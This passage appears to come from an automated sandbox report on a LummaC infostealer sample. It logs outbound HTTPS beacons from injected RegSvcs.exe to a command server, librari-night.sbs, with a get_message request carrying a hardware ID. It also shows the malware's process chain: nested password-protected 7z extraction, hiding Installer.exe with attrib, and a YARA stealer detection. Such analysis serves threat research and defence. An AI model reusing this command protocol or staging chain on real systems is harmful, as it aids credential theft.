2024-11-22 04:02:21 UTC	15331	OUT	Data Raw: 6e 0a 01 69 65 38 70 af 84 0a b0 c2 12 a8 da 7c c3 74 5c 5a 2a f1 44 98 f3 9e a7 c2 ad 59 1a de d9 b1 75 4f d3 63 ea 28 03 92 de 5e 5c 15 25 a1 ab c7 c9 89 a8 b7 92 85 81 e8 4f c3 94 b8 e8 38 0a 6e 77 1b ea f6 2d 51 9f 50 3e 31 8f 14 19 87 08 37 9b 13 58 61 88 ef 2f e3 82 cb c2 8d 28 ff c4 39 c4 8b 00 25 e5 52 fe 85 da 8e 60 84 be e0 6c 6d 06 43 62 6b 55 df 78 46 e9 f7 68 95 f1 58 6d 85 f2 54 6f 82 0a 3e 3b 2e 02 53 ba ed d6 46 ac 67 56 b2 33 06 b3 be 15 a4 9a 2a cc 2d 0a 1e 69 89 64 b9 2f fc c6 09 1f 89 b4 b4 9b c8 a9 68 d3 8e 5b e3 34 b1 dc 0b 9a 66 f8 e6 9a c7 8d af dc 0e 0f 6d ae 1f 59 f7 35 a5 05 88 b6 c9 a5 46 dc ee 5d d5 22 7f f5 25 b6 19 76 84 cb 32 cf d5 e4 21 da 71 13 92 99 d2 3e 82 d5 a7 da b2 d0 5d 21 f1 33 0e 00 43 48 f8 28 1c 0f 93 31 47 5f Data Ascii: nie8p\|t\ZDYuOc(^\%O8nw-QP>17Xa/(9%R`lmCbkUxFhXmTo>;.SFgV3-id/h[4fmY5F]"%v2!q>]!3CH(1G_
2024-11-22 04:02:21 UTC	15331	OUT	Data Raw: b7 04 18 3a 72 67 7f f8 7d 49 33 fe ef 9d ad 10 43 2f 3a a8 ef f9 1c ff 8f 10 42 07 98 53 47 7e 46 61 ab 00 0f ce e1 ed 30 80 77 e7 90 c7 d2 9d c9 d9 ff f7 ec f0 53 a0 eb 0c d2 82 61 e4 a6 01 bd 3b fd 2a b0 76 c7 37 b4 f3 81 f8 59 ef 0e 9d be 48 b7 62 b1 97 af d2 03 5a 2c d0 e4 7f 60 0f e1 38 09 78 8f 4b 58 a9 2a 90 3a 2f ca e8 fc f3 84 ce d8 3e 0c 3b 12 6c 8a 71 7e a7 6d 9a f0 80 87 0f 65 1a a9 93 eb 87 23 a8 ff fd f1 9b 52 38 ff 4f 4e 84 18 df cd 24 33 d8 21 10 08 92 19 bf 02 55 19 65 a5 f4 a4 1b a4 0a d4 f4 45 ea 37 01 46 ba 84 38 1a 4e 7e 1c 47 e0 44 97 88 ad fc b6 0a 3f ea d1 c7 fb 15 e7 48 6d dc d5 8c df d3 ac bc 52 a7 95 a5 98 38 92 e4 92 8e 0e ef 33 3d 58 89 66 67 e3 d7 56 1c d7 84 05 76 0b e6 17 90 f5 b0 e2 1d 3f c7 c0 91 66 8a 22 42 b5 d8 3f 69 Data Ascii: :rg}I3C/:BSG~Fa0wSa;v7YHbZ,`8xKX:/>;lq~me#R8ON$3!UeE7F8N~GD?HmR83=XfgVv?f"B?i
2024-11-22 04:02:21 UTC	15331	OUT	Data Raw: 9c ee 2e b5 a1 f4 40 b6 5f 1a cb 6a cd e4 ec 25 72 d5 a6 df 9a 3e 1e 3f 71 9c f3 ee fc 1c 9f 14 fe 00 9e 8e e0 55 16 ce f5 6d 78 73 d8 8d 34 24 27 f1 b1 1b e2 4d 93 99 46 1f 14 ea aa 17 47 3a 2b 02 25 7f 9f 51 66 28 88 bc 02 74 3c c7 4f 3b 33 3a ac 43 c3 03 42 5e 72 4c 08 e2 78 03 25 26 b6 f8 06 19 45 0e c5 b1 84 fd 76 c6 11 c8 8f 1d 97 b7 3b 46 4c 2a 30 90 15 da b7 e7 1c cb fd d4 09 2f 31 1d b1 ed 9f cb 27 35 31 f7 e5 42 ef fc 3b 9d e4 3e 33 43 4a 5b 93 dc 4c f4 c6 ef 03 e7 3e 38 35 19 77 1e 04 2f 0f 27 79 f2 71 96 fa 60 6d ed d3 88 56 c4 35 85 60 c3 b4 2f ca fd dd 10 a2 c5 39 75 7c 50 31 f4 f2 bf b7 a0 0a 0b 9f 8b 0b 59 67 5d 02 71 a5 10 83 00 7f 0d c4 58 42 20 75 8e 51 68 93 79 41 42 d7 e8 07 94 59 fb 61 66 73 14 45 de fa d8 fe 78 a6 25 17 61 ee 2f da Data Ascii: .@_j%r>?qUmxs4$'MFG:+%Qf(t<O;3:CB^rLx%&Ev;FL*0/1'51B;>3CJ[L>85w/'yq`mV5`/9u\|P1Yg]qXB uQhyABYafsEx%a/
2024-11-22 04:02:21 UTC	15331	OUT	Data Raw: 5f 7f e0 59 ee cf b9 47 a4 08 80 69 5b 6f a9 03 a9 6e 02 29 d4 a1 8d 26 34 3c cc 09 71 3b 9b bf ce 99 ad 4e 28 35 62 77 4b a1 5e 69 b0 da b1 13 3d b0 a2 55 0f bc 66 f8 fb 0a 09 47 00 0b ac e5 3f 04 d6 17 f8 35 f9 c1 11 44 21 05 e8 b4 2d f0 e7 64 d4 92 b4 39 31 ac 8c 0a ae 18 a8 7a e7 ed b3 32 f4 59 6d 6b 9e 3d f6 9f b7 02 47 18 38 87 9d c1 82 58 5e a0 b9 d0 c2 e4 2f fe 73 1c 87 e2 79 a1 65 f7 39 66 c8 fe ab 90 6e 8d 74 ca b4 a0 4a 54 44 6f f6 66 84 bc 2a 42 9a 59 df 7c 92 1c 31 65 2e f8 ae 42 d3 64 40 c7 a3 24 f2 10 79 cd b3 43 6f fe 43 c1 01 13 bf df 38 23 3d ac 04 50 c1 46 99 02 f8 8a b5 3a 1a 8a c5 80 ad a7 d2 3a 2a 20 97 e0 6b a7 09 7d a4 c1 ad 97 21 86 a5 dc 4e 9c 08 83 99 e2 5d b7 67 5e 8c a7 6e 46 c3 27 41 32 41 dd 87 27 33 82 1c 62 e6 aa 38 cc 88 Data Ascii: _YGi[on)&4<q;N(5bwK^i=UfG?5D!-d91z2Ymk=G8X^/sye9fntJTDofBY\|1e.Bd@$yCoC8#=PF:: k}!N]g^nF'A2A'3b8
2024-11-22 04:02:21 UTC	15331	OUT	Data Raw: 97 b3 69 81 1a b6 27 21 42 6d 66 c5 5a d7 cf 9c 23 2a 3c 23 e7 e3 8e 6d b7 78 ac 95 27 f0 67 b4 cb 54 15 ba fc df 3e 34 23 46 c3 72 fc 57 71 5a b5 84 8c 3f 7c 7e a7 6b 01 5b 55 02 d5 85 7b 12 a8 f5 e3 84 4d e6 d1 a8 f7 e2 5a e3 e0 5b ea 89 b4 10 89 4c e5 09 84 1d 93 62 1f fe 87 2f 4f 91 45 42 b0 4f 9e 2b fb dd 1f dc 7c 2f bf 66 d6 4e 9b a7 cf 4d ab 2c c1 88 1d 86 7b 3d f9 4e 52 c4 d1 49 2d 14 ed de 56 9b d8 68 d8 6f f4 4d bd e6 78 6f 76 76 5b 09 64 ed 20 c2 4f e1 df 90 c0 5f 75 88 fd 33 48 94 82 f1 88 b7 2d 6d 87 70 6a 0a 27 2f 35 bc 33 46 75 95 15 dd 53 c8 49 d4 1c e7 b8 be 4c c2 5b dd 23 cd 1a fa 61 af 9f 93 a1 25 7a 27 c0 6d a5 2c 81 a9 ce a9 02 7f d4 de 32 d7 41 9b 16 93 3c f3 76 03 84 24 78 1b 9c b8 8c bc b8 ef 45 61 22 8c 27 59 b9 a4 a3 83 e1 5b 2a Data Ascii: i'!BmfZ#<#mx'gT>4#FrWqZ?\|~k[U{MZ[Lb/OEBO+\|/fNM,{=NRI-VhoMxovv[d O_u3H-mpj'/53FuSIL[#a%z'm,2A<v$xEa"'Y[
2024-11-22 04:02:21 UTC	15331	OUT	Data Raw: 89 a0 d7 48 1a ff 3e d1 3f 26 db 06 e5 41 9e 46 b0 c6 5b 63 f5 59 25 42 09 12 fe 85 ac 7f 71 3d a9 5a 09 8d 6d 76 6f 17 2b df 7b ce 21 bd 12 e3 1b 48 20 13 1a ca b4 28 d8 4b 37 08 03 31 da 86 78 a1 86 11 e3 10 df 0e f7 8b 0f b1 97 ea 0c e4 f1 c5 a8 2b e9 84 bb 87 cd 5a bc 2f 3d 20 64 3a f9 b1 7f d3 2d b3 6b 80 5f 14 55 fb df 93 f1 e2 e0 90 e4 a3 dd 7e 83 c2 c5 c0 dd f1 ad 22 98 95 43 4c 90 f2 03 38 be e8 53 5f d4 69 a7 8f 93 be d2 9c 35 45 e9 4b 8d d1 4d 48 d4 40 5a 31 28 1c e2 43 04 28 42 ad 3d fd 16 e1 86 d6 ab 2d 96 52 e7 74 f1 ed 11 b4 00 ef 42 09 f0 14 26 be bb 20 4c ca 7d 84 5d 0c 5a eb 3f 12 63 e8 0f 76 a6 44 fa 9e 37 61 14 be 4b 5d b2 da 39 28 5f 74 b8 01 41 7a 82 86 a5 10 62 32 6f 4f 68 fd 94 f2 38 af bf 0a d9 b0 3e 62 02 33 9c 26 63 4e 07 37 0b Data Ascii: H>?&AF[cY%Bq=Zmvo+{!H (K71x+Z/= d:-k_U~"CL8S_i5EKMH@Z1(C(B=-RtB& L}]Z?cvD7aK]9(_tAzb2oOh8>b3&cN7
2024-11-22 04:02:21 UTC	15331	OUT	Data Raw: ca f3 dd fd 30 af ef d9 3e ab 0b c8 60 25 2a 4c 7b 90 1f 44 33 55 ee d4 d2 82 99 8f 70 f8 49 95 76 fb 85 6a 54 59 3d 6b 31 98 9f 87 c4 43 48 f6 1e 05 61 86 b5 7e ee 0b a2 1f ea b7 ca d0 0f ef e1 4c 8a 38 9e da 69 ed 2d 70 91 23 9b 8d 27 e2 15 06 58 63 41 05 5e 66 31 71 d1 b7 2a ac bb 54 07 5b e1 df 2b e2 fb 62 37 c4 6e 76 b3 54 79 83 2a d5 a2 bf 37 99 71 9b f3 1f 5a 8f 0d 3f 74 8f 0a 71 22 d4 ef ef 1f 51 5a 65 2a 87 27 84 a8 85 0c 95 45 21 e8 bb d3 e3 c3 40 59 18 df 0b 78 4d 7a 8e 9f f6 60 79 fd d7 30 6c fe db bb bc 0b e0 26 52 7f 1e 17 02 c7 de db 9b 11 9f 17 23 dd 9b 3e 54 18 fe ae 89 17 28 f8 96 cd 98 38 5c 30 ca 0d 9f 3c a0 47 9d 1c f3 38 fe a4 96 0c f4 c4 a6 01 c2 fd 52 41 19 54 50 51 8d a5 47 21 0b a0 85 cc e4 2e 80 d2 ee c7 d7 eb c2 fe 0f dd 99 ea Data Ascii: 0>`%L{D3UpIvjTY=k1CHa~L8i-p#'XcA^f1qT[+b7nvTy7qZ?tq"QZe'E!@YxMz`y0l&R#>T(8\0<G8RATPQG!.
2024-11-22 04:02:21 UTC	15331	OUT	Data Raw: 30 2e 84 c0 4b b0 c5 f5 25 88 12 cc 27 c7 d2 f0 29 3e 2e 0e e2 b2 57 9b 0a 33 f4 e2 43 f8 0f 71 31 28 59 48 7d 41 ac 48 d6 38 62 2e 85 97 50 f9 69 12 ff a6 45 b2 de 28 88 d0 2a 0d ef 7d b8 e6 9a 60 2a 05 7a 4d 2a 50 1a 21 0e b2 11 84 de 9b 7b 58 c9 ad 3f 3e a5 5a 18 1f 58 9f 7a 94 84 d7 10 6e 7f 87 07 c6 49 9b e7 27 f8 ef 93 3f f2 6c 40 f5 81 16 81 f7 85 3a a1 de f3 8a 97 be c6 45 d2 6d 99 0b 11 ee 03 13 a6 7a 9f 83 69 9a e8 1a 23 e3 2e 5d 10 3a ff 73 3a c3 68 20 ea 93 36 c7 75 bc 65 dd a6 65 b3 83 6f 34 a6 55 10 e1 d3 43 fa 81 0b bc 7f cd f8 f5 16 a2 b1 09 fd b1 84 cd a2 ca 89 7a f7 81 64 de 8c 38 eb 57 4f 72 e5 9b c1 cd e7 95 eb 03 36 e5 b4 9b ac 5f 73 0a 05 b4 45 56 10 f7 9c 28 44 5b 1c 22 04 90 32 c3 3e 54 6e 16 8c b9 fa 30 42 b8 43 cd e2 41 d5 d8 88 Data Ascii: 0.K%')>.W3Cq1(YH}AH8b.PiE(}`zM*P!{X?>ZXznI'?l@:Emzi#.]:s:h 6ueeo4UCzd8WOr6_sEV(D["2>Tn0BCA
2024-11-22 04:02:23 UTC	1027	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 04:02:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=4tf4b3b07k6bvfs0b0hg5p6od4; expires=Mon, 17-Mar-2025 21:49:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2F92IyHB%2F0jFUncHszzjieCLbIiFqSNS2HBuZuaoDyIlN%2FZ1qhsVqHVMjmAzy9LxcSWAG0gnvbRtN%2FWqqAAlRO18osyJHVjvI69M2dD33CR0t6o4pEsWTQFZX5OfNTp9%2FFF9Ig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e6606055b460f3b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1546&sent=299&recv=574&lost=0&retrans=0&sent_bytes=2845&recv_bytes=553831&delivery_rate=1836477&cwnd=211&unsent_bytes=0&cid=1f3a90a5ed55a301&ts=2317&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49736	172.67.206.172	443	1248	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-22 04:02:25 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 81 Host: librari-night.sbs
2024-11-22 04:02:25 UTC	81	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 63 39 42 6e 38 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 42 41 38 41 30 34 33 37 36 35 39 38 36 36 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38 Data Ascii: act=get_message&ver=4.0&lid=Fc9Bn8--test&j=&hwid=BA8A0437659866CB63CFCF7E6C45F838
2024-11-22 04:02:25 UTC	1019	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 04:02:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=enrv7fno7pf3bovh1othenbfmo; expires=Mon, 17-Mar-2025 21:49:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wYL5LR73Yhe9c6v%2FxFzwMsyOV5qD5jrrM53Viy2oBd6orB2zFC9%2Bi4eb%2FgfKMMKLSvvcXvl50FwWn0i1VJTmr3wES%2FrE%2F1LEHAY7UJ0WlDi4GxFhdJrsuXuMYR5NsXmbWFw8sA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e66061c5d0a8c0b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1914&sent=7&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=982&delivery_rate=1506707&cwnd=206&unsent_bytes=0&cid=f44fc96619e328ac&ts=782&x=0"
2024-11-22 04:02:25 UTC	54	IN	Data Raw: 33 30 0d 0a 64 33 39 43 54 38 55 59 37 62 59 39 2b 34 7a 46 35 4a 62 47 31 78 62 61 36 44 76 58 34 69 48 61 6c 48 64 6e 61 72 59 43 52 45 34 73 49 67 3d 3d 0d 0a Data Ascii: 30d39CT8UY7bY9+4zF5JbG1xba6DvX4iHalHdnarYCRE4sIg==
2024-11-22 04:02:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	23:01:58
Start date:	21/11/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	3'376'184 bytes
MD5 hash:	B570FCBE697EF79DB835D9B654974874
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	2
Start time:	23:02:02
Start date:	21/11/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
Imagebase:	0x7ff7f0ec0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	3
Start time:	23:02:02
Start date:	21/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	4
Start time:	23:02:02
Start date:	21/11/2024
Path:	C:\Windows\System32\mode.com
Wow64 process (32bit):	false
Commandline:	mode 65,10
Imagebase:	0x7ff6ff300000
File size:	33'280 bytes
MD5 hash:	BEA7464830980BF7C0490307DB4FC875
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	5
Start time:	23:02:02
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e file.zip -p1299923009167529232566422481 -oextracted
Imagebase:	0x240000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Target ID:	6
Start time:	23:02:02
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_4.zip -oextracted
Imagebase:	0x240000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	7
Start time:	23:02:02
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_3.zip -oextracted
Imagebase:	0x240000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	8
Start time:	23:02:03
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_2.zip -oextracted
Imagebase:	0x240000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	9
Start time:	23:02:03
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\main\7z.exe
Wow64 process (32bit):	false
Commandline:	7z.exe e extracted/file_1.zip -oextracted
Imagebase:	0x240000
File size:	468'992 bytes
MD5 hash:	619F7135621B50FD1900FF24AADE1524
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	10
Start time:	23:02:03
Start date:	21/11/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +H "Installer.exe"
Imagebase:	0x7ff60bae0000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Target ID:	11
Start time:	23:02:03
Start date:	21/11/2024
Path:	C:\Users\user\AppData\Local\Temp\main\Installer.exe
Wow64 process (32bit):	true
Commandline:	"Installer.exe"
Imagebase:	0x250000
File size:	918'840 bytes
MD5 hash:	18EB75EF50B1A51600E686B6B9DE277E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000B.00000003.2122410966.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Target ID:	12
Start time:	23:02:05
Start date:	21/11/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x760000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true